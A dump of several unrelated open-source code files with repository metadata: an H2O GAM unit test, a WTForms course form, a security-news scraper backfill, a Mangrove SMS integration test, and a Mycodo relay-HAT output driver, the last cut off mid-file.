h2o_data[\"C8\"] = h2o_data[\"C8\"].asfactor()\n h2o_data[\"C9\"] = h2o_data[\"C9\"].asfactor()\n h2o_data[\"C10\"] = h2o_data[\"C10\"].asfactor()\n myY = \"C21\"\n h2o_data[\"C21\"] = h2o_data[\"C21\"].asfactor()\n\n nfold = random.randint(3,8)\n h2o_model = H2OGeneralizedAdditiveEstimator(family = 'binomial', gam_columns = [\"C11\", \"C12\", \"C13\", \"C14\"], \n bs = [0, 1, 2, 3],\n nfolds = nfold,\n keep_cross_validation_models = True,\n keep_cross_validation_predictions = True,\n keep_cross_validation_fold_assignment = True,\n fold_assignment = \"random\")\n h2o_model.train(x=list(range(0,20)), y=myY, training_frame=h2o_data)\n xval_models = h2o_model.get_xval_models()\n assert len(xval_models)==nfold, \"expected {0} models but received {1} models\".format(nfold, len(xval_models))\n xval_predictions = h2o_model.cross_validation_holdout_predictions()\n xval_fold_assignments = h2o_model.cross_validation_fold_assignment()\n assert xval_fold_assignments.max() == (nfold-1), \"expected fold_assignment max: {0}, actual max: \" \\\n \"{1}\".format(nfold-1, xval_fold_assignments.max())\n assert xval_predictions.nrow == h2o_data.nrow, \"expected fold_assignment row size: {0}, actual row size: \" \\\n \"{1}\".format(h2o_data.nrow, xval_predictions.nrow)\n\n\n \nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_gam_model_predict)\nelse:\n test_gam_model_predict()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-py/tests/testdir_algos/gam/pyunit_PUBDEV_7366_gam_cv_all_params_binomial.py", "file_name": "pyunit_PUBDEV_7366_gam_cv_all_params_binomial.py", "file_ext": "py", "file_size_in_byte": 2877, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.insert", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "h2o.import_file", "line_number": 19, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.locate", "line_number": 19, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 19, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 33, "usage_type": "call"}, {"api_name": "h2o.estimators.gam.H2OGeneralizedAdditiveEstimator", "line_number": 34, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 54, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "27741560025", "text": "import re\nfrom wtforms import Form, SelectField\nfrom data_explorer.db import query_mysql\n\n\ndef course_form(lang):\n\t\"\"\"Query list of all course codes and their titles as seen\n\tin the LSR. Pass to WTForms to make a dropdown menu.\"\"\"\n\tfield_name = 'course_title_{0}'.format(lang)\n\tquery = \"\"\"\n\t\tSELECT a.course_code, a.{0}\n\t\tFROM (\n\t\t\tSELECT DISTINCT course_code, {0}\n\t\t\tFROM lsr_last_year\n\t\t\tUNION\n\t\t\tSELECT DISTINCT course_code, {0}\n\t\t\tFROM lsr_this_year\n\t\t) AS a\n\t\tORDER BY 1 ASC;\n\t\"\"\".format(field_name)\n\tresults = query_mysql(query)\n\t\n\t# SelectField takes list of tuples (pass_value, display_value)\n\tchoices = [(tup[0].upper(), '{0}: {1}'.format(tup[0].upper(), _clean_title(tup[1]))) for tup in results]\n\t\n\tclass CourseForm(Form):\n\t\t# tag removed from 'templates/includes/_formhelpers.html', so pass empty string\n\t\tform_name = ''\n\t\tcourse_code = SelectField(form_name, choices=choices)\n\t\n\treturn CourseForm\n\n\n# Internal func to remove course codes from titles\nregex = re.compile(pattern=r'[(\\[]{0,1}[a-zA-Z]{1}\\d{3}[)\\]]{0,1}')\ndef _clean_title(course_title):\n\t\"\"\"Remove course codes from titles.\"\"\"\n\treturn regex.sub('', course_title).strip()\n", "repo_name": "shalevy1/CSPS-Data-Explorer-Internal", "sub_path": "data_explorer/course_routes/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1152, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "data_explorer.db.query_mysql", "line_number": 21, "usage_type": "call"}, {"api_name": "wtforms.Form", "line_number": 26, "usage_type": "name"}, {"api_name": "wtforms.SelectField", "line_number": 29, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "17671908233", "text": "from src.Controller.AppBG_ScrapeDeamon import AppBG_ScrapeDeamon\nfrom src.Repository.BG_Report_Repository import BG_Report_Repository\nfrom datetime import date, timedelta\n\n\nclass AppBG_ScrapeBackfillsAll(AppBG_ScrapeDeamon):\n def __init__(self):\n super().__init__()\n self.repoReport = BG_Report_Repository()\n\n def load(self):\n pass\n\n def onManageSpecialBackFill_PaloAltoUnit42(self):\n print(\"Backfill Unit42\")\n\n with open('./data/Unit42_BackFill.html', newline='') as file:\n lines = file.readlines()\n text = \"\".join(lines)\n\n self._processHTML(\"https://unit42.paloaltonetworks.com/\", text, \"article\", {}, \"div[2]/h3/a\", \"div[2]/h3/a\", \"div[2]/ul/li[2]/time\")\n\n def onManageSpecialBackFill_Avast(self):\n print(\"Backfill Avast\")\n\n # Special backfil krebsonsecurity.com/page/[2-213]\n for i in range(2, 8):\n print(\"Page \" + str(i) + \"of 8\")\n\n try:\n self._processDataSource(\"https://decoded.avast.io/page/\" + str(i) + \"/\", \"article\", {}, \"div[2]/div[1]/h2/a\", \"div[2]/div[1]/h2/a\", \"div[2]/div[1]/div[2]/span[2]/span\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_KrebOnSecurity(self):\n print(\"Backfill KrebOnSecurity\")\n\n for i in range(2, 213):\n print(\"Page \" + str(i) + \"of 213\")\n\n # https://krebsonsecurity.com/page/2/,article,header/h2/a,header/h2/a,header/div[2]/div/div[1]/span\n try:\n self._processDataSource(\"https://krebsonsecurity.com/page/\" + str(i) + \"/\", \"article\", {}, \"header/h2/a\", \"header/h2/a\", \"header/div[2]/div/div[1]/span\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_darkreading(self):\n print(\"Backfill darkreading\")\n for i in range(2, 377):\n print(\"Page \" + str(i) + \"of 377\")\n\n # https://www.darkreading.com/threat-intelligence?page=377,div,class:topic-content-article,div[2]/div/div/div[1]/div[2]/a,div[2]/div/div/div[1]/div[2]/a,div[2]/div/div/div[2]/div[2]/div[2]\n try:\n self._processDataSource(\"https://www.darkreading.com/threat-intelligence?page=\" + str(i), \"div\", {'class': 'topic-content-article'}, \"div/div/div/div[1]/div[2]/a\", \"div/div/div/div[1]/div[2]/a\", \"div/div/div/div[2]/div[2]/div[2]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_threatpost(self):\n print(\"Backfill threatpost\")\n\n with open('./data/Threatpost_Backfill.html', newline='') as file:\n lines = file.readlines()\n text = \"\".join(lines)\n\n self._processHTML(\"https://threatpost.com/\", text, \"article\", {}, \"div/div[2]/h2/a\", \"div/div[2]/h2/a\", \"div/div[2]/div/div[2]/time\")\n\n def onManageSpecialBackFill_schneier(self):\n print(\"Backfill schneier\")\n for i in range(2, 811):\n print(\"Page \" + str(i) + \"of 811\")\n\n try:\n self._processDataSource(\"https://www.schneier.com/page/\" + str(i) + \"/\", \"div\", {'class': 'article'}, \"h2/a\", \"h2/a\", \"p[last()]/a[1]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_securityaffairs(self):\n print(\"Backfill securityaffairs\")\n for i in range(2, 1284):\n print(\"Page \" + str(i) + \"of 1284\")\n\n try:\n self._processDataSource(\"https://securityaffairs.co/wordpress/page/\" + str(i) + \"/\", \"div\", {'class': 'post'}, \"div/div/div[2]/div/h3/a\", \"div/div/div[2]/div/h3/a\", \"div/div/div[4]/a[1]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_cybergeeks(self):\n print(\"Backfill cybergeeks\")\n for i in range(2, 3):\n print(\"Page \" + str(i) + \"of 2\")\n\n try:\n self._processDataSource(\"https://cybergeeks.tech/page/\" + str(i) + \"/\", \"article\", {}, \"div/div/header/h2/a\", \"div/div/header/h2/a\", \"div/div/header/div/span[3]/span[1]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_hackernews(self):\n dataStart = date.today()\n print(\"Backfill cybergeeks\")\n for i in range(2, 4300):\n print(\"Page \" + str(i) + \"of 4300\")\n url = f\"https://thehackernews.com/search?updated-max={dataStart.strftime('%Y-%m-%d')}T00:00:00-00:00&max-results=25\"\n try:\n self._processDataSource(url, \"div\", {'class': 'body-post'}, \"a\", \"a/div/div[2]/h2\", \"a/div/div[2]/div[1]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n\n dataStart = dataStart - timedelta(days=1.0)\n\n def onManageSpecialBackFill_rapid7(self):\n print(\"Backfill rapid7\")\n for i in range(2, 302):\n print(\"Page \" + str(i) + \"of 302\")\n\n try:\n self._processDataSource(\"https://www.rapid7.com/blog/posts/?page=\" + str(i), \"a\", {'class': 'blog-all-posts__wrapper--item'}, \"\", \"div[1]/h3\", \" \")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_alienvault(self):\n print(\"Backfill Alienvault\")\n for i in range(2, 1583):\n print(\"Page \" + str(i) + \"of 1583\")\n\n try:\n self._processDataSource(\"https://cybersecurity.att.com/blogs/P\" + str(i), \"div\", {'class': 'blog-card'}, \"div/div[2]/a\", \"div/div[2]/a\", \"div/div[3]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_welivesecurity(self):\n print(\"Backfill welivesecurity\")\n for i in range(2, 284):\n print(\"Page \" + str(i) + \"of 284\")\n\n try:\n self._processDataSource(\"https://www.welivesecurity.com/page/\" + str(i) + \"/\", \"article\", {}, \"div[2]/h2/a\", \"div[2]/h2/a\", \"div[2]/span/time\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_nakedsecurity(self):\n print(\"Backfill nakedsecurity\")\n for i in range(2, 1628):\n print(\"Page \" + str(i) + \"of 1628\")\n\n try:\n self._processDataSource(\"https://nakedsecurity.sophos.com/page/\" + str(i) + \"/\", \"article\", {}, \"div[2]/h3/a\", \"div[2]/h3/a\", \"\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManage(self):\n self.onManageSpecialBackFill_nakedsecurity()\n self.onManageSpecialBackFill_welivesecurity()\n self.onManageSpecialBackFill_alienvault()\n self.onManageSpecialBackFill_rapid7()\n self.onManageSpecialBackFill_hackernews()\n self.onManageSpecialBackFill_cybergeeks()\n self.onManageSpecialBackFill_securityaffairs()\n self.onManageSpecialBackFill_schneier()\n self.onManageSpecialBackFill_threatpost()\n self.onManageSpecialBackFill_KrebOnSecurity()\n self.onManageSpecialBackFill_Avast()\n self.onManageSpecialBackFill_PaloAltoUnit42()\n self.onManageSpecialBackFill_darkreading()\n", "repo_name": "alainpetit21/Blowgun", "sub_path": "src/Controller/AppBG_ScrapeBackfillsAll.py", "file_name": "AppBG_ScrapeBackfillsAll.py", "file_ext": "py", "file_size_in_byte": 7992, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "src.Controller.AppBG_ScrapeDeamon.AppBG_ScrapeDeamon", "line_number": 6, "usage_type": "name"}, {"api_name": "src.Repository.BG_Report_Repository.BG_Report_Repository", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 104, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 104, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "2329807900", "text": "#vim: ai ts=4 sts=4 et sw=4 encoding=utf-8\n\n\n# This is an integration test.\n# Send sms, parse and save.\nimport random\nfrom string import upper\nfrom time import mktime\nimport unittest\nimport datetime\nfrom couchdb.design import ViewDefinition\nfrom mangrove.bootstrap import initializer\nfrom mangrove.bootstrap.views import view_js\nfrom mangrove.datastore.database import get_db_manager, _delete_db_and_remove_db_manager\nfrom mangrove.datastore.documents import DataRecordDocument\nfrom mangrove.datastore.entity import get_by_short_code, create_entity, create_contact\nfrom mangrove.errors.MangroveException import DataObjectAlreadyExists, EntityTypeDoesNotExistsException,\\\n DataObjectNotFound, FormModelDoesNotExistsException\nfrom mangrove.form_model.field import TextField, IntegerField, SelectField, ShortCodeField\nfrom mangrove.form_model.form_model import FormModel, NAME_FIELD, MOBILE_NUMBER_FIELD, MOBILE_NUMBER_FIELD_CODE,\\\nSHORT_CODE, ENTITY_TYPE_FIELD_CODE, get_form_model_by_code,EntityFormModel\nfrom mangrove.form_model.validation import NumericRangeConstraint, TextLengthConstraint\nfrom mangrove.utils.test_utils.database_utils import safe_define_type, uniq, ut_reporter_id\nfrom mangrove.transport.player.player import SMSPlayer\nfrom mangrove.transport.contract.transport_info import TransportInfo\nfrom mangrove.transport.contract.request import Request\nfrom mangrove.datastore.cache_manager import get_cache_manager\n\nclass LocationTree(object):\n def get_location_hierarchy_for_geocode(self, lat, long ):\n return ['madagascar']\n\n def get_centroid(self, location_name, level):\n return 60, -12\n\n def get_location_hierarchy(self, lowest_level_location_name):\n return [u'arantany']\n\nFORM_CODE = \"abc\"\n\n\ndef create_db(name):\n dbm = get_db_manager('http://localhost:5984/', name)\n views = []\n for v in view_js.keys():\n funcs = view_js[v]\n map = (funcs['map'] if 'map' in funcs else None)\n reduce = (funcs['reduce'] if 'reduce' in funcs else None)\n views.append(ViewDefinition(v, v, map, reduce))\n\n ViewDefinition.sync_many(dbm.database, views)\n return dbm\n\n\nclass TestShouldSaveSMSSubmission(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.dbm = create_db(uniq('mangrove-test'))\n initializer.initial_data_setup(cls.dbm)\n cls.entity_type = [\"healthfacility\", \"clinic\"]\n safe_define_type(cls.dbm, cls.entity_type)\n\n cls.entity_short_code = \"cli\" + str(int(random.random()*10000))\n cls.entity = create_entity(cls.dbm, entity_type=cls.entity_type,\n location=[\"India\", \"Pune\"], aggregation_paths=None, short_code=cls.entity_short_code,\n )\n cls.entity.save()\n cls.reporter_id = \"rep\" + str(int(random.random()*10000))\n cls.reporter = create_contact(cls.dbm, location=[\"India\", \"Pune\"],\n aggregation_paths=None, short_code=cls.reporter_id)\n cls.reporter.save()\n\n cls.phone_number = str(int(random.random() * 10000000))\n cls.reporter.add_data(data=[(MOBILE_NUMBER_FIELD, cls.phone_number),\n (NAME_FIELD, \"Test_reporter\")], submission=dict(submission_id=\"2\"))\n\n question1 = ShortCodeField(name=\"entity_question\", code=\"EID\", label=\"What is associated entity\",constraints=[TextLengthConstraint(min=1, max=20)])\n question2 = TextField(name=\"Name\", code=\"NAME\", label=\"Clinic Name\",\n defaultValue=\"some default value\",\n constraints=[TextLengthConstraint(4, 15)], required=False)\n question3 = IntegerField(name=\"Arv stock\", code=\"ARV\", label=\"ARV Stock\",\n constraints=[NumericRangeConstraint(min=15, max=120)], required=False)\n question4 = SelectField(name=\"Color\", code=\"COL\", label=\"Color\",\n options=[(\"RED\", 'a'), (\"YELLOW\", 'a')], required=False)\n\n try:\n cls.form_model = get_form_model_by_code(cls.dbm, \"clinic\")\n except FormModelDoesNotExistsException:\n cls.form_model = EntityFormModel(cls.dbm, entity_type=cls.entity_type, name=\"aids\", label=\"Aids form_model\",\n form_code=\"clinic\", fields=[question1, question2, question3], is_registration_model=True)\n cls.form_model.add_field(question4)\n cls.form_model.save()\n cls.sms_player = SMSPlayer(cls.dbm, LocationTree())\n cls.sms_ordered_message_player = SMSPlayer(cls.dbm, LocationTree())\n\n @classmethod\n def tearDownClass(cls):\n _delete_db_and_remove_db_manager(cls.dbm)\n get_cache_manager().flush_all()\n\n def send_sms(self,text, player = None):\n player = player or self.sms_player\n transport_info = TransportInfo(transport=\"sms\", source=self.phone_number, destination=\"5678\")\n response = player.accept(Request(message=text, transportInfo=transport_info))\n return response\n\n def test_should_give_error_for_wrong_integer_value(self):\n text = \"clinic .EID %s .ARV 150 \" % self.entity.short_code\n response = self.send_sms(text)\n self.assertFalse(response.success)\n self.assertEqual(len(response.errors), 1)\n\n def test_should_give_error_for_wrong_text_value(self):\n text = \"clinic .EID %s .NAME ABC\" % self.entity.short_code\n\n response = self.send_sms(text)\n self.assertFalse(response.success)\n self.assertEqual(len(response.errors), 1)\n\n def test_entity_id_with_more_than_20_chars_for_submission(self):\n response = self.send_sms(\"clinic 012345678901234567891\", self.sms_ordered_message_player)\n self.assertEqual(\"Answer 012345678901234567891 for question EID is longer than allowed.\",\n response.errors['EID'])\n", "repo_name": "mangroveorg/mangrove", "sub_path": "mangrove/transport/player/integrationtests/test_sms_submission.py", "file_name": "test_sms_submission.py", "file_ext": "py", "file_size_in_byte": 5711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "61", "api": [{"api_name": "mangrove.datastore.database.get_db_manager", "line_number": 43, "usage_type": "call"}, {"api_name": "mangrove.bootstrap.views.view_js.keys", "line_number": 45, "usage_type": "call"}, {"api_name": "mangrove.bootstrap.views.view_js", "line_number": 45, "usage_type": "name"}, {"api_name": "mangrove.bootstrap.views.view_js", "line_number": 46, "usage_type": "name"}, {"api_name": "couchdb.design.ViewDefinition", "line_number": 49, "usage_type": "call"}, {"api_name": "couchdb.design.ViewDefinition.sync_many", "line_number": 51, "usage_type": "call"}, {"api_name": "couchdb.design.ViewDefinition", "line_number": 51, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 55, "usage_type": "attribute"}, {"api_name": "mangrove.utils.test_utils.database_utils.uniq", "line_number": 59, "usage_type": "call"}, {"api_name": "mangrove.bootstrap.initializer.initial_data_setup", "line_number": 60, "usage_type": "call"}, {"api_name": "mangrove.bootstrap.initializer", "line_number": 60, "usage_type": "name"}, {"api_name": "mangrove.utils.test_utils.database_utils.safe_define_type", "line_number": 62, "usage_type": "call"}, {"api_name": "random.random", "line_number": 64, "usage_type": "call"}, {"api_name": "mangrove.datastore.entity.create_entity", "line_number": 65, "usage_type": "call"}, {"api_name": "random.random", "line_number": 69, "usage_type": "call"}, {"api_name": "mangrove.datastore.entity.create_contact", "line_number": 70, "usage_type": "call"}, {"api_name": "random.random", "line_number": 74, "usage_type": "call"}, {"api_name": "mangrove.form_model.form_model.MOBILE_NUMBER_FIELD", "line_number": 75, "usage_type": "name"}, {"api_name": "mangrove.form_model.form_model.NAME_FIELD", "line_number": 76, "usage_type": "name"}, {"api_name": "mangrove.form_model.field.ShortCodeField", "line_number": 78, "usage_type": "call"}, {"api_name": "mangrove.form_model.validation.TextLengthConstraint", "line_number": 78, "usage_type": "call"}, {"api_name": "mangrove.form_model.field.TextField", "line_number": 79, "usage_type": "call"}, {"api_name": "mangrove.form_model.validation.TextLengthConstraint", "line_number": 81, "usage_type": "call"}, {"api_name": "mangrove.form_model.field.IntegerField", "line_number": 82, "usage_type": "call"}, {"api_name": "mangrove.form_model.validation.NumericRangeConstraint", "line_number": 83, "usage_type": "call"}, {"api_name": "mangrove.form_model.field.SelectField", "line_number": 84, "usage_type": "call"}, {"api_name": "mangrove.form_model.form_model.get_form_model_by_code", "line_number": 88, "usage_type": "call"}, {"api_name": "mangrove.errors.MangroveException.FormModelDoesNotExistsException", "line_number": 89, "usage_type": "name"}, {"api_name": "mangrove.form_model.form_model.EntityFormModel", "line_number": 90, "usage_type": "call"}, {"api_name": "mangrove.transport.player.player.SMSPlayer", "line_number": 94, "usage_type": "call"}, {"api_name": "mangrove.transport.player.player.SMSPlayer", "line_number": 95, "usage_type": "call"}, {"api_name": "mangrove.datastore.database._delete_db_and_remove_db_manager", "line_number": 99, "usage_type": "call"}, {"api_name": "mangrove.datastore.cache_manager.get_cache_manager", "line_number": 100, "usage_type": "call"}, {"api_name": "mangrove.transport.contract.transport_info.TransportInfo", "line_number": 104, "usage_type": "call"}, {"api_name": "mangrove.transport.contract.request.Request", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "71766785795", "text": "# coding=utf-8\n#\n# on_off_sequent_8_relay_hat.py - Output for the 8-Relay HAT by Sequent Microsystems\n#\n# Code from https://github.com/SequentMicrosystems/8relind-rpi\n#\nfrom collections import OrderedDict\n\nfrom flask_babel import lazy_gettext\n\nfrom mycodo.config_translations import TRANSLATIONS\nfrom mycodo.databases.models import OutputChannel\nfrom mycodo.outputs.base_output import AbstractOutput\nfrom mycodo.utils.database import db_retrieve_table_daemon\n\n# Measurements\nmeasurements_dict = OrderedDict()\nchannels_dict = OrderedDict()\nfor each_channel in range(8):\n measurements_dict[each_channel] = {\n 'measurement': 'duration_time',\n 'unit': 's'\n }\n channels_dict[each_channel] = {\n 'name': f'Relay {each_channel + 1}',\n 'types': ['on_off'],\n 'measurements': [each_channel]\n }\n\n# Output information\nOUTPUT_INFORMATION = {\n 'output_name_unique': 'SEQUENT_HAT_8_RELAY',\n 'output_name': \"{}: Sequent Microsystems 8-Relay HAT for Raspberry Pi\".format(lazy_gettext('On/Off')),\n 'output_manufacturer': 'Sequent Microsystems',\n 'output_library': 'smbus2',\n 'measurements_dict': measurements_dict,\n 'channels_dict': channels_dict,\n 'output_types': ['on_off'],\n\n 'url_manufacturer': 'https://sequentmicrosystems.com',\n 'url_datasheet': 'https://cdn.shopify.com/s/files/1/0534/4392/0067/files/8-RELAYS-UsersGuide.pdf?v=1642820552',\n 'url_product_purchase': 'https://sequentmicrosystems.com/products/8-relays-stackable-card-for-raspberry-pi',\n 'url_code': 'https://github.com/SequentMicrosystems/8relind-rpi',\n\n 'message': 'Controls the 8 relays of the 8-relay HAT made by Sequent Microsystems. 8 of these boards can be used simultaneously, allowing 64 relays to be controlled.',\n\n 'options_enabled': [\n 'i2c_location',\n 'button_on',\n 'button_send_duration'\n ],\n 'options_disabled': ['interface'],\n\n 'dependencies_module': [\n ('pip-pypi', 'smbus2', 'smbus2==0.4.1')\n ],\n\n 'interfaces': ['I2C'],\n 'i2c_location': ['0x27'],\n 'i2c_address_editable': False,\n\n 'custom_options': [\n {\n 'id': 'stack_number',\n 'type': 'select',\n 'default_value': 0,\n 'options_select': [\n (0, 'Board 1'),\n (1, 'Board 2'),\n (2, 'Board 3'),\n (3, 'Board 4'),\n (4, 'Board 5'),\n (5, 'Board 6'),\n (6, 'Board 7'),\n (7, 'Board 8'),\n ],\n 'name': 'Board Stack Number',\n 'phrase': 'Select the board stack number when multiple boards are used'\n }\n ],\n\n 'custom_channel_options': [\n {\n 'id': 'name',\n 'type': 'text',\n 'default_value': '',\n 'required': False,\n 'name': TRANSLATIONS['name']['title'],\n 'phrase': TRANSLATIONS['name']['phrase']\n },\n {\n 'id': 'state_startup',\n 'type': 'select',\n 'default_value': 0,\n 'options_select': [\n (0, 'Off'),\n (1, 'On')\n ],\n 'name': lazy_gettext('Startup State'),\n 'phrase': 'Set the state of the GPIO when Mycodo starts'\n },\n {\n 'id': 'state_shutdown',\n 'type': 'select',\n 'default_value': 0,\n 'options_select': [\n (0, 'Off'),\n (1, 'On')\n ],\n 'name': lazy_gettext('Shutdown State'),\n 'phrase': 'Set the state of the GPIO when Mycodo shuts down'\n },\n {\n 'id': 'on_state',\n 'type': 'select',\n 'default_value': 1,\n 'options_select': [\n (1, 'HIGH'),\n (0, 'LOW')\n ],\n 'name': lazy_gettext('On State'),\n 'phrase': 'The state of the GPIO that corresponds to an On state'\n },\n {\n 'id': 'trigger_functions_startup',\n 'type': 'bool',\n 'default_value': False,\n 'name': lazy_gettext('Trigger Functions at Startup'),\n 'phrase': 'Whether to trigger functions when the output switches at startup'\n },\n {\n 'id': 'amps',\n 'type': 'float',\n 'default_value': 0.0,\n 'required': True,\n 'name': \"{} ({})\".format(lazy_gettext('Current'), lazy_gettext('Amps')),\n 'phrase': 'The current draw of the device being controlled'\n }\n ]\n}\n\n\nclass OutputModule(AbstractOutput):\n \"\"\"An output support class that operates an output\"\"\"\n def __init__(self, output, testing=False):\n super().__init__(output, testing=testing, name=__name__)\n\n self.device = None\n\n self.stack_number = None\n\n self.setup_custom_options(\n OUTPUT_INFORMATION['custom_options'], output)\n\n output_channels = db_retrieve_table_daemon(\n OutputChannel).filter(OutputChannel.output_id == output.unique_id).all()\n self.options_channels = self.setup_custom_channel_options_json(\n OUTPUT_INFORMATION['custom_channel_options'], output_channels)\n\n def initialize(self):\n import smbus2\n\n self.setup_output_variables(OUTPUT_INFORMATION)\n\n try:\n self.logger.debug(f\"I2C Bus: {self.output.i2c_bus}\")\n if self.output.i2c_location:\n self.device = RELAYS(smbus2, self.output.i2c_bus, self.logger)\n self.output_setup = True\n except:\n self.logger.exception(\"Could not set up output. Check the I2C bus and address are correct.\")\n return\n\n for channel in channels_dict:\n if self.options_channels['state_startup'][channel] == 1:\n self.output_switch(\"on\", output_channel=channel)\n else:\n # Default state: Off\n self.output_switch(\"off\", output_channel=channel)\n\n for channel in channels_dict:\n if self.options_channels['trigger_functions_startup'][channel]:\n try:\n self.check_triggers(self.unique_id, output_channel=channel)\n except Exception as err:\n self.logger.error(f\"Could not check Trigger for channel {channel}: {err}\")\n\n def output_switch(self,\n state,\n output_type=None,\n amount=None,\n duty_cycle=None,\n output_channel=None):\n if output_channel is None:\n msg = \"Output channel needs to be specified\"\n self.logger.error(msg)\n return msg\n\n if not self.is_setup():\n msg = \"Error 101: Device not set up. See https://kizniche.github.io/Mycodo/Error-Codes#error-101 for more info.\"\n self.logger.error(msg)\n return msg\n\n try:\n if state == 'on':\n self.device.set(self.stack_number, output_channel + 1, self.options_channels['on_state'][output_channel])\n self.output_states[output_channel] = bool(self.options_channels['on_state'][output_channel])\n elif state == 'off':\n self.device.set(self.stack_number, output_channel + 1, not self.options_channels['on_state'][output_channel])\n self.output_states[output_channel] = bool(not self.options_channels['on_state'][output_channel])\n\n msg = \"success\"\n except Exception as err:\n msg = f\"CH{output_channel} state change error: {err}\"\n self.logger.error(msg)\n return msg\n\n def is_on(self, output_channel=None):\n if self.is_setup():\n if output_channel is not None and output_channel in self.output_states:\n return self.output_states[output_channel] == self.options_channels['on_state'][output_channel]\n\n def is_setup(self):\n return self.output_setup\n\n def stop_output(self):\n \"\"\"Called when Output is stopped.\"\"\"\n dict_states = {}\n if self.is_setup():\n for channel in channels_dict:\n if self.options_channels['state_shutdown'][channel] == 1:\n self.output_switch(\"on\", output_channel=channel)\n elif self.options_channels['state_shutdown'][channel] == 0:\n self.output_switch(\"off\", output_channel=channel)\n self.running = False\n\n\nclass RELAYS:\n \"\"\"\n A Class to support the Sequent Microsystems 8-Relay HAT for the Raspberry Pi\n I2C addresses: 0x20\n Board stack: 0 - 7\n Relay number range: 0 - 7\n Adapted from the code at https://github.com/SequentMicrosystems/8relind-rpi\n \"\"\"\n DEVICE_ADDRESS = 0x38 # 7 bit address (will be left shifted to add the read write bit)\n ALTERNATE_DEVICE_ADDRESS = 0x20 # 7 bit address (will be left shifted to add the read write bit)\n RELAY8_INPORT_REG_ADD = 0x00\n RELAY8_OUTPORT_REG_ADD = 0x01\n RELAY8_POLINV_REG_ADD = 0x02\n RELAY8_CFG_REG_ADD = 0x03\n relayMaskRemap = [0x01, 0x04, 0x40, 0x10, 0x20, 0x80, 0x08, 0x02]\n\n def __init__(self, smbus, bus, logger):\n self.logger = logger\n self.bus = smbus.SMBus(bus)\n\n def relayToIO(self, relay):\n val = 0\n for i in range(0, 8):\n if (relay & (1 << i)) != 0:\n val = val + self.relayMaskRemap[i]\n return val\n\n def IOToRelay(self, iov):\n val = 0\n for i in range(0, 8):\n if (iov & self.relayMaskRemap[i]) != 0:\n val = val + (1 << i)\n return val\n\n def check(self, bus, add):\n cfg = self.bus.read_byte_data(add, self.RELAY8_CFG_REG_ADD)\n if cfg != 0:\n self.bus.write_byte_data(add, self.RELAY8_CFG_REG_ADD, 0)\n self.bus.write_byte_data(add, self.RELAY8_OUTPORT_REG_ADD, 0)\n return self.bus.read_byte_data(add, self.RELAY8_INPORT_REG_ADD)\n\n def set(self, stack, relay, value):\n if stack < 0 or stack > 7:\n raise ValueError('Invalid stack level!')\n stack = 0x07 ^ stack\n if relay < 1:\n raise ValueError('Invalid relay number!')\n if relay > 8:\n raise ValueError('Invalid relay number!')\n\n hwAdd = self.DEVICE_ADDRESS + stack\n try:\n oldVal = self.check(self.bus, hwAdd)\n except Exception as e:\n hwAdd = self.ALTERNATE_DEVICE_ADDRESS + stack\n try:\n oldVal = self.check(self.bus, hwAdd)\n except Exception as e:\n self.bus.close()\n raise ValueError('8-relay card not detected!')\n oldVal = self.IOToRelay(oldVal)\n try:\n if value == 0:\n oldVal = oldVal & (~(1 << (relay - 1)))\n oldVal = self.relayToIO(oldVal)\n self.bus.write_byte_data(hwAdd, self.RELAY8_OUTPORT_REG_ADD, oldVal)\n else:\n oldVal = oldVal | (1 << (relay - 1))\n oldVal = self.relayToIO(oldVal)\n self.bus.write_byte_data(hwAdd, self.RELAY8_OUTPORT_REG_ADD, oldVal)\n except Exception as e:\n self.bus.close()\n raise ValueError('Fail to write relay state value!')\n self.bus.close()\n\n def set_all(self, stack, value):\n if stack < 0 or stack > 7:\n raise ValueError('Invalid stack level!')\n stack = 0x07 ^ stack\n if value > 